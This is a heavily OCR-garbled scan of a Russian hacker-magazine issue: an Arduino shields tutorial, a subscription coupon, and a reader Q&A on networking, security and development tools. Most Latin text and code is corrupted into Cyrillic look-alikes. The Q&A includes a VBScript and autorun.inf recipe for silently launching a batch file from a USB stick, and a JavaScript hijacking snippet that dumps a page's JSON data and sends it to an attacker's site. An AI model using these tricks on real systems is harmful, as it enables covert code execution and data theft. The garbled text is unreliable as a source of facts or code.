ности через твиттер жаловалась на сухость и требовала немед- 
ленного полива. 

При всем многообразии применения Еегпе(5Ме(а хочу пред- 
упредить о том, что каждая библиотека, безусловно, экономит 
время, однако и отнимает несколько килобайт флеш-памяти 
микроконтроллера. Поэтому, если рано или поздно упрешься в 
предельный размер 30 Кб своей Агдито ОиетЦапоуа — подумай 
о замене на Меда 2560, памяти для скетчей будет раз в восемь с 
половиной больше. 


Использование 5О-карт 


В проектах, связанных с накоплением какой-либо информации 
(Например, СР5-координат], часто требуется нарастить объем 
доступной энергонезависимой памяти. Проще всего это сделать, 
подключив стандартную 50-карту. Для этого есть несколько гото- 
вых шилдов. Самый симпатичный из известных мне вариантов 

— тисго50 пойще, разработан испанской фирмой /БеШигт, 
специализирующейся на мониторинге окружающей среды [900.9 
'НСУд). 

Шилд занимает всего одну колодку пинов Агдипо и позволяет 
работать с 50 и 5ОНС-картами, предварительно отформатирован- 
ными на в РАТТ1б [предпочтительнее] или ГАТЗ2. Единовременно 
можно работать только с одним файлом, длинные имена не под- 
держиваются. 


Беспроводные шилды 


Самые простые ВЕ-модули на амплитудной модуляции (АЗК), 
работающие в нелицензируемом диапазоне 433 и 313 МГц хоть 
и могут использоваться с Агаито через библиотеку Уп{иа\\!ге, 
но все равно представляются мне довольно плохим вариантом. 
Слишком сильно они подвержены помехам, устойчиво работают 
только на низких скоростях, не имеют аппаратного разделения 
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на каналы — несколько одновременно работающих передатчиков 
будут мешать друг другу. Может быть, именно поэтому шилд-плат 
для них я пока не встречал. 

Полярную противоположность представляют платы семейства 
ХБее, основанные на протоколах /1дбее, идеально подходящие 
для организации распределенных сенсорных сетей с автономным 
питанием. Каждая такая плата сама по себе является устройством 
с микроконтроллером на борту, и от шилда требуется совсем 
немного — обеспечить согласование с Агаитпо. Называются такие 
шилды обычно «ХБее 5Ме[ а», но не всегда — например, !БеШит 
разработал СоплптипксаНоп 5Ме[4 (9009.9/070х0. Шилд обяза- 
тельно содержит два ряда колодок, к которым пристыковывается 
модуль в формате ХБее. Единственный недостаток, пожалуй, 

это цена самого модуля ХБее. Взамен получаем скорость до 250 
Кбит/с, дальность в пределах прямой видимости до 90 метров 
[модификация ХБее РКО может добивать до 1,2 км], шифрование, 
экономное энергопотребление и возможность ретрансляции дан- 
ных (два модуля прозрачно общаются друг с другом через третий). 
Давно замечено, что если в компании заходит речь про бес- 
проводные сети, первым делом почему-то вспоминают про \ЛЕ!, 
гораздо реже — про Вшеюос{В. В качестве примеров подойдут 
УЛЕ\у Зе от брагКЕип [зрагКфип.сого/огофис1/9954] и Вшеюос{й 
тподце от /беШит (соокта-Васк$.сопЛп4ех. рб р/агЧипо- 
Бшеос-тподще-89 670. Последний выполнен в формате ХБее 

и будет работать с любым переходным шилдом для ХБее, а про- 
граммная настройка из Агито напоминает диалог с модемом — 
через последовательный порт и АГ-команды. Кстати, в свое время 
была выпущена оригинальная плата Агдипо ВТ [(агЧипо.сс/еп/ 
Машп/АгаипоВоагаВше{юоо ], которая не имела У5В-интерфейса, 
но программировалась и подключалась к компьютеру именно 
через Вшаюос<{й. Большого распространения она не получила — 
может быть, в силу увеличения цены. 

Для обмена данными через СЪМ обычно используется мобильник, 
способный работать по последовательному порту на уровнях ТТИ. 
Но сейчас таких все меньше и меньше — их вытесняет Ц5В, для 
работы с которым требуется быть хостом (а не девайсом, како- 
вым является Агди!по). Но, к счастью, производители уже давно 
штампуют законченные С$М-модули, к которым остается при- 
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тего$О-модуль от Нбе!игл — совсем крохотный 


«В проектах, связанных с 
накоплением какой-либо 
информации (например, 
СР5-координат), часто 
требуется нарастить объем 
доступной энергонезависимой 
памяти» 


крутить внешнюю антенну и разъем симки. За примером далеко 
ходить не надо — СРК Оцадраптпа тодше Гог Агаито от ИБешим 
([доо.дИКиеЕН), который базируется на СРЕА5-модеме от 5АСЕМ. 
Особенность именно этой модели — СКР5-модуль съемный, и 
можно передавать не только данные — разведен выход на внеш- 
ний спикерфон. 


Разные шилды 


Подводя краткий итог, можно с уверенностью сказать — решения 
почти всех типичных задач давно существуют в виде шилдов. Но 
не стоит думать, что на этом все заканчивается. Вот несколько 
примеров: Раф!аНоп 5епзог Воага от !БеШит [счетчик Гейгера]. 
И вроде бы идея не нова — но все равно, пока Фукусима не гря- 
нула, никому в голову не пришло запустить подобное в серий- 
ное производство. Другая интересная идея заложена в основу 
Зееедито З(аЩег — она способна при необходимости быть и 
Агаито-совместимой платой, и шилдом, что достигается при 
помощи двух параллельных рядов контактов. В настоящий момент 
идет активная разработка 4$В Ноз{ 5Ме[а — он позволит под- 
ключать к Агашпо устройства, подключаемые в обычных условиях 
к компьютеру. Существует также масса шилдов для индикации — 
начиная с семисегментных дисплеев, заканчивая ТЕТ-экранами с 
тачскином. Меня больше всего заинтересовал о -5Ме|. Вроде 
бы простая матрица из светодиодов, но на принципе хекосплек- 
сирования. Этот хитрый прием использует возможность пинов 
А{гтеда находиться в трех состояниях (0, 1 и высокое сопротив- 
ление). В результате усердной пайки 126 светодиодов, получаем 
полноценную матрицу 9х14, не израсходовав даже всех пинов 
Агаипо, а в качестве примеров к библиотеке предлагаются игры 
«Жизнь», «Тетрис», «Пинг-понг» и «расе |пуадегз». 

Поэтому, если у тебя есть свободное время и оригинальная идея 
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\МАНу-шилд от ра ип 


— обязательно найди время поделиться с сообществом Ен л 


ДишШЬ, тебе и хЕму МотЮает, И Е разводкой помогут. Ведь Вет 
ничего более захватывающего, чем коллективыое твоБчЧество. 


Шилд своими руками 


В качестве примера создадим свой собственный (СО-шилд. 
Схема подключения популярного алфавитно-цифрового ЖКИ- 
дисплея 1602 на контроллере НО44780 возможна в двух вари- 
антах — восьмибитной шиной или четырехбитной. Самое время 
открыть стратегию шилдостроения Агито: пинов много не 
бывает! Стараемся использовать их по минимуму и поэтому 
выбираем четырехбитную схему [на наше счастье, поддержка 
такой схемы входит в дистрибутив Агдитпо Е, в виде библиотеки 
ЧашаСгу&{а0. 

Используем для построения нашего шилда специальную заготов- 
ку — протошилд, который представляет собой макетную плату с 
небольшими изысками. Самая главная его ценность — это пра- 
вильно расставленные отверстия для пинов, для идеальной сты- 
ковки с Агаипо. Так уж получилось, что все колодки пинов рас- 
положены на сетке с шагом 2,54 мм, кроме одной (если бы не этот 
досадный факт, можно было бы взять любой кусочек «дырчатой 
макетки» и впаять в него стыковочные вилки РИ 5$}. Сделано это 
было специально, чтобы реципиент по рассеянности не вставил 
шилд наоборот и не пожег на корню будущий шедевр. 

Обрати внимание, что схема предусматривает наличие перемен- 
ного резистора для регулировки контрастности. Это важно! Если 
забить на это, при правильной в остальном схеме и скетче ничего 
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Совсем немного пайки — так и схема несложная... 


видно не будет. Подойдет любой на 10-20 кОм, а конкретно на 
этом протошилде он уже и так предусмотрен — правда подключен 
ко входу апа([о90, поэтому придется припаять лишний проводок. 
Возьмем кусочек штыревой гребенки РЕ$ и распаяем сначала 

на контакты дисплея, а затем — на шилд. После этого надо взять 
монтажный провод и аккуратно, по очереди, зачистить и напаять 
проводки от дисплея к пинам Агаито согласно схеме — благо, 
она несложная. У меня интуитивным образом получилось упрятать 
большую часть под дисплей. 

Оденем полученный результат на Аг4ито и загрузим первый 
тестовый скетч-пример из каталога ан аСгу$а(. Ничего нет на 
экране? Или куча черных квадратиков? Не беда, самое время 
подкрутить переменный резистор — уверен, что-то обязательно 
появится! В этом случае можешь облегченно вздохнуть — теперь 


› 138 


Читать текст на родном языке всегда приятнее! 


у тебя есть первый шилд собственного изготовления. Ну и раз уж 
он заработал — можно заодно его русифицировать. В свое время 
я изменил стандартную библиотеку так, чтобы символы кирилли- 
цы корректно транслировались из ИТЕ-8 в знакогенератор дис- 
плея. Ищи последнюю версию библиотеки на ч(ВиБ.сого/гоК90. == 
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1. Разборчиво заполни подписной купон и | 7 НОМЕРОВ —_ 2700 РУБ 
квитанцию, вырезав их из журнала, сделав Е 
ксерокопию или распечатав с сайта М ЕРО В | ) 60 руб 


| 2. Оплати подписку через любой банк. к. В 


| 3. р одре УАНАЙ АК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ ЖУРНАЛ 


любым из нижеперечисленных способов: 


® на е-тац: - | 
по факсу: [495] 545-09-06: ПЕНЬ ЕТ 


® почтой по адресу: 115280, Москва, 
ул. Ленинская Слобода, 19, Омега плаза, 
5 эт., офис № 21 
000 «Гейм Лэнд», отдел подписки. 
ЗА 12 МЕСЯЦЕВ 
Внимание! Если произвести оплату в августе, ЗА 6 МЕСЯЦЕВ 
то подписку можно оформить с октября. 


Единая цена по всей России. Доставка ЕСТЬ ВОПРОСЫ? Пиши на 'пто@а(с.ги или звони по бесплатным 

за счет издателя, в том числе курьером телефонам 8(495)663- 82-77 р москвичей] и 8 (800] 200-3- 

по Москве в пределах МКАД 999 [для жителей других регионов России, абонентов сетей 
МТС, БиЛайн и Мегафон). 


ПОДПИСНОЙ КУПОН 


ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 


[] на 6 месяцев 


С на12 месяцев Извещение ИНН 7729410015 ООО «Гейм Лэнд» 
и ы ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 
Ш Доставлять журнал по почте к/с № 30101810900000000990 
на домашний адрес 
БИК 044583990 КПП 770401001 
Доставлять журнал курьером: 
[] на адрес офиса* Плательщик 
[] на домашний адрес* * Адрес (с индексом) 
(отметь квадрат выбранного варианта подписки) 
Назначение платежа Сумма 
ФИО Оплата журнала « 
Е 
Ф.И.О. 
Кассир 


Подпись плательщика 
АДРЕС ДОСТАВКИ: 
индекс 
областыкрай 
город, 
улица 
ом корпус 
квартира/офис 
телефон ( ) 


код 


ИНН 7729410015 ООО «Гейм Лэнд» 


Квитанция 
ОАО «Нордеа Банк», г. Москва 


р/с № 40702810509000132297 

к/с № 30101810900000000990 

БИК 044583990 КПП 770401001 
Плательщик 


, Адрес (с индексом) 
е-тай 


сумма оплаты 


*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 


Назначение платежа Сумма 


Оплата журнала « 


с 
Ф.И.О. 
Кассир Подпись плательщика 


УМТ5 


Степан «5{ер» Ильин (мег. сот/${ерайп) 


та 


ИП 


ед? 


Есть вопросы — присылай 
на {аа@геа|.хаКер.ги 


О:Каким образом можно дешево поднять 
УР-СЪМ-шлюз? 

Д: Хороший подарок в решении этой про- 
блемы сделали нам сотовые операторы, 
которые практически бесплатно раздают 
3Зб-модемы по разным акциям. Несмотря на 
цветастые логотипы, большинство из них 
родилось в Китае на фабриках компании 
СТЕ или Нцчаме!. Проверенным вариантом, 
который подойдет для решения постав- 
ленной задачи, является Ниа\ме! е1 550, 
умеющий передавать голосв С5М. Тут 

надо сказать, что З6б-модемы продаются 
залоченными на конкретного оператора, 

а возможности для голосового общения у 
них урезаны на программном уровне. И то 

и другое без труда обходится с помощью 
многочисленных инструкций, которые дав- 
но разлетелись по всему рунету. На форумах 
есть и нужные прошивки — короче говоря, 
маленькое недоразумение решается быстро 
и недорого. Таким образом, с помощью 
устройства, которое стоит две копейки, 
можно звонить и принимать входящие вы- 
ЗОвы. 

Хорошо, но как это не использовать для 
создания $!Р-65М-шлюза? На компьютер с 
подключенным модемом устанавливается 

$ Р-клиент, который дергает голос в обе 
стороны с этого модема и направляет на 

5 Р-сервер (а>{ет1зК, ок{еЦ, э1рпе ит.д.). 

В результате получается 65М-$51Р-шлюз. 


> 14.0 


Особого внимания здесь заслуживает 
программа ОК{еЦ $1Р-С5М ба{е\мау (млллм. 
{е[зуз{епп5.ги/да*ем/ауз], которую специ- 
ально разработали для создания шлюзас 
использованием 3ЗС-модемов. На текущий 
момент поддерживает следующие девайсы: 
Нца\ме! ЕТ 550, Нцамие! ЕТ 609, (ТЕ МЕ180. 
Технология, на самом деле, не новая: ки- 
тайцы давно производят шлюзы \Уо!Р-65М в 
железном корпусе. Но оцени разницу в цене: 
стоимость такого девайса на одну симку на- 
чинается от $300 (модем, напомню, продают 
за 700-800 рублей, ато и вовсе дарят). Воз- 
можно, в ближайших номерах мы сделаем об 
этом подробную статью. А пока рекомендую 


почитать БК. (у/аМ МОТО. 


О: В Адоре На$й есть опция для преобра- 
зования 5\\Е-файлов в Ю5-приложения. 
Кажется, со стороны Арре некоторое 
время даже был запрет на использова- 
ние подобных технологий, позволяю- 
щих создавать программы для!РПопе/ 
Ра4 сторонними средствами. Скажи, 
имеет ли подобная функция право на 
существование или это просто пунктик в 
списке опций для красного словца? 

Д: За отчетом я обратился кнашемуавтору - 
Евгению Кузьмину, который профессиональ- 
но занимается разработкой под 105, и вот 
что он ответил: «Для очень простецких игр 

и несложных приложений, где нет физики, 


кучи спрайтов и прочих наворотов, такая 
возможность может быть и сгодится. Но для 
серьезных разработок она, честно скажу, 
слишком тормозная». Так что, увы, если есть 
желание разрабатывать игры для !РВопе/ 
|Ра4, то без изучения ОБ|есйуе-С - никуда. 


О: Можно ли каким-нибудь образом не- 
заметно запустить ра!-файл с флешки? 
Д: Теперь, сучетом того, что компания 
М!сгозо фактически отрубила возмож- 
ность автозапуска с флешки, сделать это 
будет нелегко. Но на старых непропатченных 
системах сработаеттакой трюк: 

1. Закидываем на флешку ту [е.м6$ со сле- 
дующим содержанием: 


5еЕ и5И$Ие11 = Сгеафе06]ес*( 
"М5сг1ре.5Не11") 

И$И$Пе11.Кип "стма.ехе /с 
[ИМЯ_ВАТ_ФАЙЛА]", 9, +а15е 


2. В ащогип.1пЁ добавляем следующее: 


[АчфоВип ] 
У5еАичфоР1ау=1 
ореп=туй1е .\6$ 


Обрати внимание, что хотя для пользователя 
запуск будет незаметным, некоторые анти- 

вирусы забьюттревогу и предупредят юзера 
о подозрительных файлах на УЪВ-носителе. 
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ЕР шрист 


Настройка установленных модемов 


| 
] р ЧРИ ЗА Е, = 
Ш. З5З0Т, нове: ненвестен Соединение устеновлизни | Напр 
а еж ЕЕ, 9 лы : ЕЗЕ БЫ. В, вн. - ха 
Я 3: оеонювсты Совднеенона ‘устениовалазняу | Наетремеь » | 
Е 255, номер нокжесии = Соодинониеустьюалена = [Ниве 
и | } = ЕЕ азы Г ге : 


71 Настройка ОК{е! $ТР-С$М да{емгау 
Ы Настройка анты ети из т ме Е Ы 


Тита Песоетрийет 
Кы 64 Менее НЫБ 
а | №7 | = 


ани, РЕВ Е ты, Ре течет: 
Мибеве бык. реак ятетьые. ТаБ Иа: 


г = 
[7] ооо нее 


аа 

рЕНаЛе Рога убазасее сы 

рефмае ЗИ: 14; 

реизию ИаескыЕЬЕЫ » БЕС СВЫИСУеиСВЬ > бас и р 


рЕНЕ аенЕуСиЕОеЕИ 
| 
кн: 0 = ба 


КИ бЕати = 
| 


ви МазьНар ||: 


ЕЕ 


3С-модема 


О: Веду небольшой проект, который 
стремительно развивается. Поскольку 
через сайт ведутся операции скре- 
дитными картами, хочу обзавестись 
полноценным 55 -сертификатом. Под- 
хожу к безопасности серьезно. Сколько 
стоит 551 -сертификат для сайта? Есть 
ли какой-то вариант получить его бес- 
платно? 

Д: Полноценный 551 -сертификат, какты 
правильно понимаешь, за простотак никто 
не выдает. Правда, есть возможность бес- 
платно обзавестись триальным сертифи- 
катом на ограниченный срок [на 30 или 90 
дней). Тест-драйв в частности можно зака- 
зать через сайт млм. 1геез$1.5и. Как говорят 


владельцы сервиса, «такой сертификат 
предназначен для тестирования техниче- 
ской инфраструктуры до покупки коммер- 
ческого 55[-сертификата». Что удобно, 
выпускается он втечение нескольких минут, 
а для его получения достаточно заполнить 


простую форму: 


Уоиг Мате : 

Ехатр]1е: Зойп $т1еИ 

Уосцг Е-та11: 

Ехатр1е: те5{@ехатр1Те. сот 
РПопе: 

Ехатр1е: 8(495)2295670 
5е1ес{ {Не зегуег 5о{маге изед фо 
депега*фе Ве С5В: 

Ехатр1е: Араспе-$$Е 

СВ: 

Ехатр1е: 


МТТОУБССАГКСАОАМАТЕММВОСАЛИЕАХММАС\ 7 а 
С507ХхМ9-тМубТЕ$МВАСА1ЦЕСхМЭ 
Тигуа2\/9а\м5пМКЕмОмУО\УООКЕмп7ХМОТЕЭу7 
2Е$МВАСА1ИЕВхМЭ\/С\/7АСВВахв5 
Ва+611г5Х51047уЕ1рЕаР1Мск5\е1еС 7089 / 
Оекб5Кпо7ом4Т\/ухАР63607Ваш7е 

61$+7м409 ТО /6Тбук2)Х01++58КЕОЗМУТОСТ 
В1Рик@8В/ и\/ 


Вопросы может вызвать только последнее 
поле — СЪК [СегиЯса{е 519птд Кедиез{. 
Сюда нужно вставить информацию отвоем 
сертификате, включая публичный ключ 
(Руб(с Кеу). Сгенерировать его можно через 
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Настраиваем шлюз С$М-\оР на базе 


Пратт ата шя 
ВЕалаыл упавые а" ТТ" 


Используем СО СУ! для просмотра 
отреверсенного кода Апагою- 
приложения 


орепз$( (подробнее читай в статье млллм. 
Нее$$|.зи/агс(е$/13]. А чтобы подключить 
сертификат потребуется настройка гпоЧ _$$1 
для Араспе (считаем, что в качестве веб- 
сервераты используешь именно его). Весь 


процесс пошагово описан в этом материале 
— ммм геез$|.5и/агИс(е$/14. 


О: Объясни на пальцах, что такое 
]ауасир1 ППасКта? 

Д: Лучше всего на этот вопрос ответит наш 
автор - Тарас Иващенко [ох еп]. 

Атака известна достаточно давно (статья по 
теме - 5\.1уДОМ!р\] и втекущих версиях боль- 
шинства веб-браузеров уже неактуальна. 


Тем не менее, остаются старые веб-браузеры 
и вариации атаки с форматом /5ОМР. В двух 
словах, атака основана на возможности в 
]ауа5спр{ переопределить «сеттеры» для 
свойств объектов. 

Допустим, уязвимое веб-приложение пере- 
даетв /5ОМ-формате какие-либо критичные 
данные воттак: 


[{"Роо" : "рг1уа*е дафа"}] 


Злоумышленник может сделать специ- 
альную страницу с /5-кодом, в котором 
переопределяет «сеттер» для свойств объ- 
екта. Таким образом, при инициализации 
свойства Тоо сработает «триггер», в котором 
значение этого поля и сдампится: 


ОБ] ес*.ргофотуре. __аейпезе {ег __ 

(`Гоо`, РОЛЕБТОПС Хх). | 

уаг $ = ""; 

ВОРСР И ЕП 
В, о 


} 


$ += "Фоо: 


+х; 
// пересылаем строку $ обычным 
// добавлением картинки на сайт 
// злоумышленника 

}); 

</$сг1рф> 

<5сг1ре згс="И р: / /Фагве*. сот/ 

рг1уа%е/да*а. 5" ></зсг1ре> 


С /5ОМР, сучетом его предназначения, 
еще проще: достаточно просто передать в 
качестве параметра подключаемого скрипта 


ПЕС ЕСТ. 


вин вы био $51 УРМ Зегисе 
с5со 


В вен Алёиевы 0ОСХ-ХКХ-4175} 2 


О Рвопаеаи © 


В Разасое 775504 
Е БАК Ба 


Гы м] 


Двухфакторная авторизация, которая 
легко подключается к любой системе 


название определенной функции. Получен- 
ный ответ будет в таком виде: 


ему11Еипс Топ ( {"рарег": "Ад", "соип*": 


5}) 


То есть будет вызвана функция, опреде- 
ленная злоумышленником, в которую будет 
передана в качестве параметров информа- 
ция суязвимой страницы. 


О: Передо мной стоит задача— создать 
мощное приложение, которое выгляде- 
ло бы, как обычное десктопное. Какой 
фреймворк выбрать? 

А: Мой совет - Ех$ Мммм. зепсва.согп), кото- 
рый развивается уже очень давно и позволяет 
разрабатывать веб-страницы, которые будут 
практически неотличимы от обычного при- 
ложения. Элементы интерфейса, перетаски- 
вание, мгновенное обновление содержания, 
окна и таскбары, мощные таблицы — все это 
уже реализовано в одном, почти мегабайтном 
файлике кода. Ех/5 предоставляет компо- 
нентную модель построения, гибкую систему 
стилизации и расширения языка /]ауа$сг!р* 
для более удобной разработки. За это, конеч- 
но, приходится платить снижением произво- 


дительности, но для многих это мелочь. 


О: Как Грамотно отсечь пользовате- 

лей со старыми браузерами, выдав им 
предупреждение о необходимости 
обновиться? 

Д: Теперь даже гиганты вроде боод(е 
начинают отказываться от поддержи уж 
слишком устаревших браузеров, закапывая 
в могилу 6-го ослика. Для |Чиегу, всенародно 
любимой ./5-библиотеки, доступен плагин, 
чтобы одной строкой отсекать несознатель- 
ных пользователей (аиегу Вем/Ке$.согп/ 
ого\м/ег]. Отличный вариант. 


О: Какускорить Му5аЕ? 

Д: Последние версии мускула достаточно 
быстрые, но с осознанием того, что по5ЦЁ 
не потеснить, ребята придумываютеще 
более радикальные методы увеличения 
производительности. Для особых случаев 
есть Напа[ег5оске{ Рид, который может 
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работать с таблицами гораздо эффектив- 
нее, используя легковесный сетевой слой 
и простой протокол вообще без всякого 
ЪЯ(. Такие решения позволяют серверу 
упереться в производительность сетевой 
карты или дисков, обслуживая, к примеру, 
750 тысяч запросов к мускульной таблице 
в секунду! 


О: Все больше и больше вирусов зара- 
жают МВК, хочу научиться отслеживать 
подобные ситуации. Какие утилиты мож- 
но использовать для анализа МВК? 

А: Одним из самых полезных инструментов, 
которые я видел для исследования МВК, 
является набор Рег|[-скриптов Вос{ Кесога 
Рагзегс (млм. дагукез$[егпе/зоН\маге/тпаех. 
Вл 0, в который помимо прочего входят: 

® пбграгзег — парсер ВО5/Л//пдом5 МаЗег 
Вос{ Кесога (МВВ)]: 

® Борагзег — парсер загрузочных секторов 
ГАТ или МТЕЗ. 

Чтобы лучше вникнуть втему, рекомендую 
тебе прочитать статью «Ап Ехатипайоп 01 
{Пе ${апдага МВВ» [В иДу/к!ЗА\М\а]). 


О: Подскажи способ максимально 
быстро исследовать жесткие диски на 
наличие некоторого контента. Для при- 
мера возьмем етай-адреса. 

Д: В кругу компьютерных криминалистов все 
чаще называют программу Би_еж{гас{ог 
[а ИБ.ога/зоН\миаге/ь К ехгастог). Это на- 
писанная на С++ утилита, которая скани- 
рует образ диска, файл, или директорию с 
файлами и баснословно быстро извлекает 
разного рода информацию. Скорость до- 
стигается за счеттого, что Бик_ех{гас{ог 

не парсит структуры файловой системы, а 
работает с жестким диском напрямую, при 
этом может работать с разными участками 
образа параллельно. 

При этом программа может сканировать 
как обычный НОО, таки 550, оптические 
носители, карты памяти, дампы сниффера 
ит.д. Существующие модули позволяют из- 
влекать, к примеру, номера кредитных карт 
(что очень ценно для тех, кто занимается 
Ч'д(а(!огеп$!с$], информацию ЕХИЕ из фото- 
графий и видео, 1Р/МАС/Ета{-адреса, ЧКЕ 
ит.д. Результаты обычно имеют довольно 
громоздкий вид, поэтому для последующей 
обработки результатов разработчики пред- 
лагают ряд вспомогательных скриптов на 
Ру{Воп'е. 


О: Какой сейчас самый быстрый способ 
взломать МО5 и другие хэши? 

Д: Если не брать в расчет радужные табли- 
цы, атакже распределенные системы, то од- 
ним из лучших вариантов является старый 
добрый /овп {Ве Еррег (млм. орепумаЦ.согп/ 
об) с набором патчей, которые используют 
для ускорения возможности видеокарты. 
Для разного вида хешей используются раз- 
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личные технологии ускорения за счет СРИ: 
® ОрепС(Г: МТ, гам/-МО4, гам- МО5, М5ЕВАР 
и гами-5 НАТ: 

® СОБА: гам-5НА?56, рПраз°. 

Раз уж мы вспомнили про /овп {Пе Киррег, не 
могу не упомянуть, что с недавнего времени 
утилита научилась брутить не только хэши, 
нои пароли кархивам /1Р и КАК, РОЕ- 
документам, атакже 55Н-ключи. Рекомен- 
дую посмотреть также тулзу 'апазПори от 
Ивана Голубева (Вл. доибеу. сого/б [09]. 


О: Какие программы используют для 
реверсинга Апаго!а-приложений? Отсут- 
ствие жестких политик внутри магазина 
приложений Апаго4 тагк& иногда на- 
стораживает — хочется самому убедить- 
ся, что установленная программа не 
будет отправлять на платный номер. 

Д: Начну с небольшого пояснения. Устрой- 
ство на базе Апаго!а может выполнять при- 
ложения, которые были сконвертированы 

в специальный формат - амК Ехесща ще 
(Чех). Для таких бинарников существует 
немало декомпиляторов. Талантливый 
китайский студентеще в прошлом году опу- 
бликовал утилиту дех2\аг (соде.дооб(е.согп/р/ 
Чех2аг}, преобразующую .дех-бинарники в 
читаемый //ауа-код, который удобно просма- 
тривать через /0-С\ [ауа.десотрЦеггее. 
8). Еще одним известным декомпилятором 
является °тпа| (соде.доод(е.сот/р/зта!. 
Среди прочих подобных продуктов выде- 
ляется КМад (Мл. гпа{азапо.соп?), который 
нативно работаетс ШОа\м!к-байкодом и пре- 
образуетего напрямую в Лауа-байткод, что 
дает результат гораздо лучшего качества. 
Декомпилятор написан на Киру и работает 
под \М/п9оми$, Шпихи О5Х. 


О: Какие есть инструменты, чтобы по- 
смотреть, как на самом низком уровне 
взаимодействуют драйвер и 15В- 
устройство? 

Д: Возможность логировать У5В-трафик 
позволяет, к примеру, /УМугаге. Для этого в 
конфиг виртуальной машины [утх-файл] 
нужно добавить следующие строки: 


и5б . апа]1ухег.епаб1е = ТКИЕ 
топ1фог = "аебид" 

и5б . апа]1ухег.тахЁ1пе = 8192 
тои$е.\миц$Б .епаб1Те = РАЕЗЕ 


После этого весь трафик в виде «как есть» 
будетлогироваться в файл угпумаге.109. В 
таком дампе без вспомогательных инстру- 
ментов сам черт ногу сломит, поэтому лучше 
сразу взять в напарники еще и прогу у5и$6- 
апа(узег (уизБ-апа(ухегзоигсеогае. пе/ 
иона. Помимо этого можно преобра- 
зовать получившийся логв более привыч- 
ный РСАР-формат, воспользовавшись на- 
писанным на Кибу скриптом угпмии$62рсар. 
г6 [.уДа7А]ч). 


О: Когда звонишь в са|-центр какой- 
нибудь компании, то сразу попадаешь на 
автоматизированную систему. «Нажми- 
те 0 для связи с оператором», «Нажмите 
1 для того, чтобы узнать баланс» ит.д. 
Нужно реализовать что-то подобное, 
как? 

А: Речь идетоб [МВ (англ. |п{егасНуе Уотсе 
Резропзе], системе предварительно за- 
писанных голосовых сообщений, выпол- 
няющей функцию маршрутизации звонков 
внутри са(-центра. 

Пользователь общается стакой систе- 

мой посредством тонального набора. 
Реализовать УК можно с помощью уже 
наверняка знакомого тебе проекта А\етх 
([илллм/.аз{ег!К.ога). Всю логику простой 
|УК-системы можно реализовать через 
конфигежепс$!оп$.сопР, но для сложных за- 
дач лучше использовать возможности АС]. 
Это скрипты на Рег или Ру{Поп, с помощью 
которых можно создать довольно слож- 

ные сценарии работы голосового робота. 
Реализация через А$ептх очень дешева, но 
при этом весьма масштабируема. На самом 
обычном компьютере могут одновременно 
обслуживаться сотни звонков без каких- 
либо затруднений. 

Поднять самую простую |УК можно по этой 
несложной инструкции: Б\.у/1М]26К. Замечу, 
что таким образом можно создавать и авто- 
матических роботов, которые будут обзвани- 
вать абонентов, к примеру, с напоминанием 
об оплате счета. 


О: Мне очень нравится возможность 
двухфакторной авторизации у боодЕе, 
когда для входа требуется ввестиеще 
и одноразовый пароль, который по 
особому алгоритму генерируется на 
телефоне. Есть ли готовое подобное 
решение, которое МОЖНО Подключить 
к своему ресурсу для усиления защиты 
пользователя? 

А: Есть несколько коммерческих серви- 
сов, которые можно красиво интегри- 
ровать в свои продукты: Оио 5есигпу 

(лм. ФиозесигИу. согп] и бутагес'$ МР 
АцВеписаНоп бегусе [Млллм. мег 51дп.согп]. 
При должном желании можно сэкономить 
и реализовать все самому, используя 
разработку МоБЦе-ОТР (ппо{р.зоигсеТогое. 
пе. Клиентская часть, с помощью которой 
пользователю будет выдаваться одноразо- 
вый пароль, написана на Лауа и может быть 
запущена практически на любом современ- 
ном устройстве, а на сервере может быть 
использован КА Ц5-сервер (например, 
ХТРаЧ!и$}, с помощью которого будет выпол- 
няться авторизация. Ты можешь справед- 
ливо заметить, что на Апаго!4 или 1РБопе 
запустить Чауа-приложение не выйдет. Так 
и есть, но энтузиасты уже написали при- 
ложения для генерации токенов и для этих 
платформ..32 
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ВЕЕТ СИА ЗИСЮСЕ 


оф я Для определения 
о утчченич РИ] 39. левы музыки на слух 
МИМИМ. ГПО ТТ. СОГП 


© Ни одно другое мобильное приложениетак не впечатляетлюдей, как 
ЭВагат или его аналог $оипЯ9Ноилпа. Все просто: они умеют определять 
исполнителя и композицию «на слух». Каждый из нас задавался вопро- 
сом, что это сейчас играет (например, по радио}, а подобные инструмен- 
ты быстро дают ответ. Та же самая технология лежит и в онлайн-сервисе 
гп!Аогпг. Через простой интерфейс можно снять звук с микрофона и 
быстро получить информацию о произведении. Алгоритмы настоль- 

ко изящны, что можно даже самому напеть запомнившийся отрывок 
произведения — и сервис зачастую найдет правильное совпадение. 


Получилось даже у меня, без слуха и без голоса. Вау! Вот это пис 
Ипдегргпи по! 
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Для тестирования сайта в 
разных браузерах 


© Занимаясь глобальной переработкой нашего сайта (маленький 
тизер, ага}, мы столкнулись с проблемой тестирования верстки в разных 
браузерах. Находкой оказался сервис Вгом/зег(аБ. Вообще сам факттого, 
что это продуктАдоБе — уже гарант качества. Через удобный интерфейс 
ты можешь проанализировать, как запрошенный сайт отображается 

в самых разных браузерах и ОС без необходимости устанавливать в 
системе дополнительный софти системы виртуализации. Нужно только 
вбить ЧКЕ нужного сайта. А дальше можно просто переключаться между 
видами, сравнивать их, расположив рядом или даже наложив один на 
другой, выравнивать по сетке ит.д. Очень качественная реализация 
идеи, которая пока предоставляется совершенно бесплатно. 
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ОФВт время как НТМЕ5 шагает по планете, Н[азВ все больше и больше 


притесняют. Отказаться от использования прожорливого по части ре- 
сурсов [азВ’а там, где это можно — это вообще тренд сегодняшнего дня. 
Не секрет, что в стандартных мобильных браузерах !РВопе и Ради ряда 
других девайсов вообще нет (азВ-плеера. Интерактивный контент, 
построенный натехнологии АдорВе, просто не отображается. К счастью, 
для владельцев сайтов и приложений на флешетеперь есть макси- 
мально простой способ преобразовать ЕазВ 5\\МЕ в файл в НТМЕ5. Этим 
занимается новое веб-приложение от бооц(е — 5\иНу. Сейчас поддер- 
живается 5\/\/Е 8 иАсНоп5 стр: 2.0, а результат корректно работает во всех 
браузерах на движке \М\Меб Ки (СРготе, Моше За{аг! ит.д.). 
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© Не могу не рассказать об этом замечательном сервисе для состав- 
